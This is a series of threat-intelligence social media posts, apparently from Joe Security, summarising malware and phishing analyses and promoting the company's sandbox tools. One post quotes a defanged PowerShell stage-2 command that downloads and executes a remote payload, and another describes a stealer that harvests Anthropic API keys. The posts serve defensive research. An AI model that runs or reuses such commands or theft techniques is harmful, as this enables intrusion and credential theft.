Really nice paper on defeating evasive malware - huge kudos to the authors 👏🔥 In a nutshell: They use AI-generated instruction-skip YARA rules to automatically bypass evasions inside CAPE and expose hidden malware behavior 🤯 Also interesting: Joe Sandbox came out as the clear leader for malware family detection compared to the other sandbox platforms in their evaluation 🏆🦠 Great to see academic research using Joe Sandbox as a strong benchmark 💪 buff.ly/Rw9xpVo

🚨 Python "WSUS exploit" or malware trap? 🐍 Joe Reverser found a fake exploit-generation script hiding obfuscated marshal payloads that launch download chains for Windows 🪟 and macOS 🍎. Observed: ⚙️ Go reflective loader 🍎 MAC Stealer 🌐 py-installer[.]com lookalike infra 🔐 Encrypted staging 🧠 In-memory execution 🎯 Likely targeting security researchers, exploit collectors, and malware analysts. buff.ly/t94b7kI #ThreatIntel #MalwareAnalysis #CyberSecurity

Unknown phishing kit with browser-fingerprinting / VM-detection spotted 🕵️‍♂️ The script probes WebGL, RTC/STUN, plugins, console behavior, prototype hooks, screen/window/navigator props and more to identify analysis environments. Joe Sandbox detects the evasion and directly chains the run to a bare-metal analyzer — where the phishing payload continues execution 💪🔥 🔗 buff.ly/Efang1e 🔗 buff.ly/mND50Rp #JoeSandbox #Phishing #MalwareAnalysis #ThreatIntel #CyberSecurity #DFIR #Evasion

🚨 New analysis from Joe Reverser: Sikka BFaaS — an operationalized Indian banking fraud toolkit targeting SBI, HDFC, Paytm, BHIM/NPCI UPI, FreeCharge, PhonePe, Axis Bank & IRCTC. 🔐 Implements HWID-bound licensing, reseller/operator roles, AES-encrypted C2 traffic, and encrypted `.rg` session files. 🧬 Uses stolen mobile banking API keys, device fingerprint spoofing, OAuth/session hijacking, OTP interception flows, and UPI cryptographic abuse. 🛡️ Includes anti-debugging, VM checks, tool blacklisting, registry tampering, and Chrome/WebDriver automation. Deep technical breakdown in Joe Reverser. 🔍⚙️ buff.ly/ssnHBf0

🚨 Firebase-Powered PowerShell Backdoor Targeting Indian Entities 🚨 🔴 Key findings: • Fake PDF decoy dropped to distract victims 📄 • Persistence via disguised Microsoft Edge scheduled task 🕵️ • Firebase used as stealth C2 infrastructure ☁️ • Remote command execution through PowerShell ⚡ • Typosquatting domain: thehindus[.]org impersonating The Hindu 📰 • Hidden stage-2 payload: `irm https[:]//thehindus[.]org/jk | iex` 🧬 TTPs observed: ✅ PowerShell abuse ✅ LOLBins (`conhost.exe --headless`) ✅ Base64 obfuscation ✅ Firebase dead-drop C2 ✅ Scheduled task persistence ✅ Recon exfiltration 🎯 Likely aligned with SideCopy-style tradecraft targeting Indian entities. IOC Highlights: 🌐 thehindus[.]org 🌐 my-automation-a936d-default-rtdb[.]firebaseio[.]com 🧾 SHA256: 8c91214e0553bb3bd6c57b9eaae70099fe2d5bcd44a6beeaa3e3fab4f775397c Verdict: 🔥 MALICIOUS (9/10) buff.ly/jq0zxTf #Malware #ThreatIntel #CyberSecurity #DFIR #ThreatHunting #PowerShell #APT #SideCopy #InfoSec #MalwareAnalysis

🚨 AI-generated phishing kits are evolving FAST. We analyzed a fully operational Microsoft 365 AiTM phishing framework using: ☁️ Cloudflare Tunnels 🛡️ Dual CAPTCHA gates 🎯 Targeted victim prefill 🔑 Real-time MFA interception 🤖 Strong LLM-generated code fingerprints Attack flow: Google Redirect → CAPTCHA → CAPTCHA → Fake Microsoft Login → Live Credential Relay Highlights: ⚡ MFA push approval interception 🌍 Victim fingerprinting via 4 IP intel services 🎭 Multi-brand impersonation (OneDrive, Adobe, Teams, SharePoint & more) 🔄 Dynamic OAuth-style URL obfuscation 💸 Zero-cost rotating infrastructure via TryCloudflare This wasn't a simple phishing page. It was a scalable AI-assisted phishing platform. Full technical analysis below 👇 buff.ly/92zzR4q #CyberSecurity #Phishing #AiTM #ThreatIntelligence #M365 #SOC #DFIR #Cloudflare #OSINT #MalwareAnalysis #Infosec #CyberThreats #LLM

🚨 New research from Joe Security: A spear-phishing campaign targeting Pakistan’s PSCA & PPIC3 abused ⚡ VS Code Remote Tunnels and Discord webhooks for stealthy remote access. Instead of stealing Microsoft accounts, attackers enrolled victim machines into their own VS Code tunnel infrastructure using device-code authentication - a clever twist on classic phishing techniques. 🎯 Key findings: 🔹 Malicious Office macros downloading & executing `code.exe` 🔹 Abuse of legitimate VS Code tunneling workflows 🔹 Discord webhooks used for exfiltration & status reporting 🔹 ClickOnce-based PDF delivery chain impersonating Adobe Reader 🔹 Trusted Microsoft infrastructure leveraged for persistence & stealth This campaign highlights how threat actors increasingly weaponize legitimate developer tooling to blend into normal cloud traffic. ☁️💻 Read the full analysis here 👇 buff.ly/BE5w9Yq #CyberSecurity #ThreatIntelligence #MalwareAnalysis #Phishing #VSCode #Microsoft #BlueTeam #DFIR #JoeSecurity

🚨 Auphora Stealer: AI apps entering infostealer scope Early signals point to "Claude-aware" collection routines (e.g., harvest_claude()): • Electron storage parsing (LevelDB / IndexedDB) • Session cookies & auth artifacts • Extensions / MCP configs • User context data 🎯 Primary objective: Anthropic API keys – from LevelDB state – from ANTHROPIC_API_KEY env vars AI desktops should be treated like browsers—same surface, higher value. buff.ly/cXAEr5w

🚨 Threat Insight: Emerging LLM-Generated Infostealer 🤖🛑 A Python-based infostealer 🐍 has surfaced under the label “HackerAI Stealer Pipeline,” presented as an “authorized pentesting tool.” Despite the branding, the workflow clearly aligns with credential-theft operations: Chrome password extraction 🔐 → data staging 📦 → Telegram exfiltration 📤 → self-deletion 🧹. Attribution to a specific platform remains unverified ⚠️. However, the structured pipeline, consistent formatting, and descriptive comments strongly suggest LLM-assisted development 🧠💻. This reflects a broader shift 📈: adversaries are leveraging AI to rapidly generate and refine commodity malware, reducing development effort while increasing scalability. buff.ly/xRtREhP #ThreatIntel #CyberSecurity #Malware #LLM

🚨 Malware Analysis Drop 🚨 A trojanized UninstallTool.exe isn’t what it claims to be… 🔍 Static reversing (Joe Reverser): • Fake Authenticode signer 🎭 • Embedded PE payload .NET in-memory loader 🧩 • Privilege escalation & persistence APIs ⚙️ 🧪 Dynamic analysis (Joe Sandbox): • 100/100 malicious score 💯 • ZTrat RAT with ngrok C2 tunnel 🌐 • Drops Recovery.exe scheduled task persistence ⏱️ • Firewall bypass & stealthy comms 🔥 🎯 Verdict: Legit app disguise → full RAT infection chain Static dynamic = full visibility 👀 buff.ly/xzPJJMQ buff.ly/owxiQ3V #malware #cybersecurity #threatintel #reverseengineering

🚨 Advanced spear-phishing campaign uncovered by Joe Reverser Initial access via themed lure ("Safe Jail Project") with dual attachments: • DOC: VBA macro dropper executing staged payload • PDF: Fake Adobe Reader lure triggering alternate infection path Payload delivery via BunnyCDN-backed infrastructure → execution establishes persistence by abusing Microsoft VS Code Remote Tunnel (LOLbin technique) C2/exfiltration signaling via Discord webhook — blending malicious traffic with trusted services to evade detection 🧠 Detected & analyzed by Joe Reverser 🔍 Full technical breakdown: buff.ly/PiclLSY

🧵 From a "harmless" DLL to a fully reconstructed multi-stage #CobaltStrike Beacon. In our latest blog, we break down how we: 🔍 Uncovered a hidden multi-stage loader chain 🧠 Bypassed anti-sandbox domain checks 🛠️ Rebuilt dumped memory into runnable PE files 🌐 Reconstructed C2 comms & crypto 🎯 Extracted IOCs and linked the implant to known infrastructure A deep dive into loader reconstruction, memory forensics, protocol analysis, and attribution. Read it here: buff.ly/KphCsNI #MalwareAnalysis #ThreatIntel #DFIR #ReverseEngineering #InfoSec

🚨 CVE-2026-34621 – Adobe Acrobat Reader PDF Vulnerability 📄⚠️ Multiple analysts have taken a deep dive into this threat using 🧪 Joe Reverser — definitely worth exploring: 🔍 Analysis #1 buff.ly/T4cobjJ 🔍 Analysis #2 buff.ly/BAskKQM Packed with insights into modern PDF exploitation techniques 💡🛠️ #malware #infosec #threatanalysis

HWmonitor supply chain attack 🚨 (kudos to @OfficialPCMR 🙌) confirmed by Joe Reverser 🔍💻 buff.ly/Yo8nLis Stay cautious when downloading updates ⚠️📦 and always verify sources 🔐✅

🚨 Joe Reverser's Export Mode (rebranded from Skill Only Mode) in action - you can dive deep, ask the agent specific questions, and really understand what’s going on inside a sample. Take this recent case 👇 A 64-bit loader hiding a Meterpreter reverse shell: • RC4-encrypted payload in .fltpk • Dynamic API resolution via PEB walking • Anti-debugging (RDTSC BeingDebugged) • Heavy obfuscation to evade static tools No more just reading reports — now you can explore and question every layer. 🔬 Check the report: buff.ly/iQzkyyY ✨ Bonus: The report now includes a capability image workflow & IOC diagrams

Google: “We’ve added protections to stop potentially unwanted apps from changing your search engine.” PUA devs: fine, we’ll just politely navigate there with 40 Tabs and hit Enter until it works (source Joe Reverser)

🚀 Joe Reverser 1.0.0 “Silver Wolf” is officially out! This stable release brings major upgrades for automated malware & phishing analysis: • Full Chromium web agent for realistic attack navigation • Redesigned Code Sandbox for faster deobfuscation workflows • Skill Only Mode for precise analyst control • Chat Report for full analysis traceability • Office document analysis for phishing campaigns From phishing lure to final payload — analyze the full attack chain with greater depth and transparency. Read the release: buff.ly/dfj94NA #cybersecurity #malware #threatintel #phishing